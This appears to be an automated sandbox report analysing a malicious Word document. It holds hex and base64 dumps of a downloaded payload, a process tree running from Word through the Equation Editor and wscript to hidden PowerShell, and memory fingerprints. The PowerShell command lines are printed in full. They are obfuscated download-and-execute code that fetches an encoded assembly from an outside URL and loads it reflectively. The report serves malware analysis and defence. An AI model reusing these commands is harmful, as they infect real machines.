2f 79 59 67 41 41 41
            Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
            2024-10-05 12:49:47 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
            Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
            2024-10-05 12:49:47 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
            Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
            2024-10-05 12:49:47 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
            Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
            2024-10-05 12:49:47 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
            Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
            2024-10-05 12:49:47 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
            Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
            2024-10-05 12:49:47 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
            Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
            2024-10-05 12:49:47 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
            Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:08:49:37
            Start date:05/10/2024
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Imagebase:0x13f430000
            File size:1'423'704 bytes
            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:08:49:38
            Start date:05/10/2024
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Imagebase:0x400000
            File size:543'304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:08:49:42
            Start date:05/10/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS"
            Imagebase:0x660000
            File size:141'824 bytes
            MD5 hash:979D74799EA6C8B8167869A68DF5204A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:08:49:43
            Start date:05/10/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Imagebase:0xed0000
            File size:427'008 bytes
            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:08:49:44
            Start date:05/10/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )"
            Imagebase:0xed0000
            File size:427'008 bytes
            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.364639582.00000000002AF000.00000004.00000020.00020000.00000000.sdmp, Offset: 002AF000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_2af000_EQNEDT32.jbxd
              Similarity
              • API ID:
              • String ID: 1S$1S
              • API String ID: 0-3369570919
              • Opcode ID: 56032aff66585100633fb090edc706df515ed84e2013f913f6890c609018db52
              • Instruction ID: d3553e848f7bdbc071efabb93788e6bdfb40cca50a2111ba894816b812618170
              • Opcode Fuzzy Hash: 56032aff66585100633fb090edc706df515ed84e2013f913f6890c609018db52
              • Instruction Fuzzy Hash: 0AC1EF6241E3C18FD7039B3888A96957FB0AF67210F0E46DBC4C4CF5B7D268991AD722
              Memory Dump Source
              • Source File: 00000002.00000002.364639582.00000000002AF000.00000004.00000020.00020000.00000000.sdmp, Offset: 002AF000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_2af000_EQNEDT32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 609ee277f18754a2266ba2bd3b3d1b14d16a55f9457f06880a72434c4345215a
              • Instruction ID: c50542c383361aeba7192061429401cdaaeb156bac1a21f61d3296d8f5d669ff
              • Opcode Fuzzy Hash: 609ee277f18754a2266ba2bd3b3d1b14d16a55f9457f06880a72434c4345215a
              • Instruction Fuzzy Hash: 9732FC6544E3C19FC7478B7488B89927FB0AE53220B0E46EBC5C1CF4B7D258598ADB32
              Memory Dump Source
              • Source File: 00000002.00000002.364639582.00000000002AF000.00000004.00000020.00020000.00000000.sdmp, Offset: 002AF000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_2af000_EQNEDT32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 11aa725320a7ded1af4975a85a0633953e57e26aef408c4020fc90c37e870f47
              • Instruction ID: 4eb8aa0a77f2a8973870055f195e2723ac5c9e3f6b4f4f541ee62b08c35f919c
              • Opcode Fuzzy Hash: 11aa725320a7ded1af4975a85a0633953e57e26aef408c4020fc90c37e870f47
              • Instruction Fuzzy Hash: D8A1916544E3C19FC7079F7889A95817FB0AE6724430E86DBC8C5CF4BBC218A91AD732
              Memory Dump Source
              • Source File: 00000002.00000002.364639582.00000000002AF000.00000004.00000020.00020000.00000000.sdmp, Offset: 002AF000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_2af000_EQNEDT32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8453ed4522236490c22569bb1608fedcabf7bc4ebe4f522165e9281a2ed96257
              • Instruction ID: b8e923bb10c6275bbca2b469bc25b9cc640e7fc8d682234bf36798a32631ff80
              • Opcode Fuzzy Hash: 8453ed4522236490c22569bb1608fedcabf7bc4ebe4f522165e9281a2ed96257
              • Instruction Fuzzy Hash: 6CB1546105E7C19FCB078B304CA5A857F70AE63204B0E86EBD894CF4B7D25A5A29D737
              Memory Dump Source
              • Source File: 00000002.00000002.364639582.00000000002AF000.00000004.00000020.00020000.00000000.sdmp, Offset: 002AF000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_2af000_EQNEDT32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e4855916d43e12d71cbc8b2b0ceab9d6b8707eaa65b2c5ce04718bf7fca8a6e6
              • Instruction ID: 0ff59426549782692849e601bdc01af09443fb1cc4f21709b224815cb14f88eb
              • Opcode Fuzzy Hash: e4855916d43e12d71cbc8b2b0ceab9d6b8707eaa65b2c5ce04718bf7fca8a6e6
              • Instruction Fuzzy Hash: 4791466105E7C19FCB078B304C66A857F70AE23204B0E96EBD894CF5A7D25A5A29D337
              Memory Dump Source
              • Source File: 00000006.00000002.386122094.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e777eb2914dd9073ca1f81e64d47830186afb4b4144f805f7988245a5e29ae06
              • Instruction ID: fc50a3313ee57aca452272b15bcb0f30eb9d09de39e7a7fc87094fdc9dab006a
              • Opcode Fuzzy Hash: e777eb2914dd9073ca1f81e64d47830186afb4b4144f805f7988245a5e29ae06
              • Instruction Fuzzy Hash: A101A271504340AAE7215E29EC84B67BFE8EF85724F28851BFC494B386C779DC45CAB1
              Memory Dump Source
              • Source File: 00000006.00000002.386122094.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 910a48ddb8b8d7cf35c1aa2fec9e58f02593a79021d4c3ddc696a0dc2b6f1b21
              • Instruction ID: 6ff1559cf165b583e8e33666fa53ce975da707a09cbcc23bf591c262c2120331
              • Opcode Fuzzy Hash: 910a48ddb8b8d7cf35c1aa2fec9e58f02593a79021d4c3ddc696a0dc2b6f1b21
              • Instruction Fuzzy Hash: ED015E6140D3C09FD7128B259C94B62BFB4DF53224F1981DBE8888F2A7C2699C49C772
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$$p$$p$$p$$p$$p$$p
              • API String ID: 0-1881991961
              • Opcode ID: 5058611f97309d4c2bf7e6b78c8f2d16cbe44509e1da40fb5a9d19833ffb012b
              • Instruction ID: f6e5617794111933777847be63386ca8080d68f47ba2afccbc577018f01ab0af
              • Opcode Fuzzy Hash: 5058611f97309d4c2bf7e6b78c8f2d16cbe44509e1da40fb5a9d19833ffb012b
              • Instruction Fuzzy Hash: 8812EF31B04305DFDB289FA8D450BAABBF6AFC5310F24846AD5498B2D1DB35CD45CBA2
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 0Up$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p
              • API String ID: 0-1959524672
              • Opcode ID: 36bd21ab5279acf73fb04055b77f5957afbfe5d408f4055997e628635510c9f3
              • Instruction ID: e9763a42f2ea06725cb4be180b20c0b45074edeb6cd30d44035a4236f9196fd5
              • Opcode Fuzzy Hash: 36bd21ab5279acf73fb04055b77f5957afbfe5d408f4055997e628635510c9f3
              • Instruction Fuzzy Hash: 00A22571B042409FCB259B68985066ABBFAAFC5310F28C8BBD945CF2D1DB35DD42C7A1
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'p$$p$$p
              • API String ID: 0-2931952147
              • Opcode ID: 37d1086a97234d083dd19a5761acc63cc2ebf380f4c6fdce645e06338a653ea1
              • Instruction ID: 62576608c4727796f0fd04cddf583424a78702580f2afbb5e1d9a16cd964029b
              • Opcode Fuzzy Hash: 37d1086a97234d083dd19a5761acc63cc2ebf380f4c6fdce645e06338a653ea1
              • Instruction Fuzzy Hash: AC3126307003498FCF258B65C8157BA7BB9AFD0344F2985BAD8499B1D2EB74CD82C761
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.380275756.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_900000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: tPp
              • API String ID: 0-1477601333
              • Opcode ID: a21c778c370920a2af5c01c8db74cdd06de0c1460b18a8211590c37c14bb6cfc
              • Instruction ID: 78222e104ff61268c62179c98841bcaeec3d42de6714f0e0c1c9b25fc6b33e96
              • Opcode Fuzzy Hash: a21c778c370920a2af5c01c8db74cdd06de0c1460b18a8211590c37c14bb6cfc
              • Instruction Fuzzy Hash: 8741B530A093818FC7128B64C864A5DFFB1EF86300F59849BE9859F2E3C7319C46C752
              Memory Dump Source
              • Source File: 00000008.00000002.380068469.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_3e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d3e165a036188bae819fc1acc1fc446b89bf4fcf9e6e409dce6522e7798e6c0
              • Instruction ID: 5ec51a4112e6205f002f036cc45c3f169b448a72b3f24ec49584392216c7c6cf
              • Opcode Fuzzy Hash: 1d3e165a036188bae819fc1acc1fc446b89bf4fcf9e6e409dce6522e7798e6c0
              • Instruction Fuzzy Hash: 19323874A01258EFDB06CF99D484A9DFBF2BF88310F258559E804AB395C771ED86CB90
              Memory Dump Source
              • Source File: 00000008.00000002.380068469.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_3e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 772d500b6b146eba645e272c369dae8d31ac680e8389632b5e96bb919d8ada71
              • Instruction ID: 5e13276698b678f8c79f484409f5f948db1663e1174a8ec281973dcbb6ae19b5
              • Opcode Fuzzy Hash: 772d500b6b146eba645e272c369dae8d31ac680e8389632b5e96bb919d8ada71
              • Instruction Fuzzy Hash: 7002C570A05398AFCB06CF69D494A9DBFB1FF49310F598196E484AB3A2C730ED46CB51
              Memory Dump Source
              • Source File: 00000008.00000002.380068469.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_3e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0d5b5d6dd6c9507e752ee2181d6d599972f4d55414336afe3a9ae03f9322856
              • Instruction ID: a7c59ec103bb1c9adb29d2fbdc2f0f806401e29744f3f4773339675915ebf3bc
              • Opcode Fuzzy Hash: e0d5b5d6dd6c9507e752ee2181d6d599972f4d55414336afe3a9ae03f9322856
              • Instruction Fuzzy Hash: 7971B13560D7D08FD7079B65A8A42EA3F71AF42318F1A41E7D485CF2E3DA288C4AC791
              Memory Dump Source
              • Source File: 00000008.00000002.380068469.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_3e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 92abcc9faf95c34dce23096aea2138e439826e082e82c5d3f84cc8266692b5eb
              • Instruction ID: f15e24144dd4a4c06435483a43530ea5d18be815274774b29071a6e3141adcfc
              • Opcode Fuzzy Hash: 92abcc9faf95c34dce23096aea2138e439826e082e82c5d3f84cc8266692b5eb
              • Instruction Fuzzy Hash: E5413431B046A08FE707EB75D8887AA77B6EB85328F154675D40A9F3E1CB389C46C790
              Memory Dump Source
              • Source File: 00000008.00000002.380068469.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
              Joe Sandbox IDA Plugin
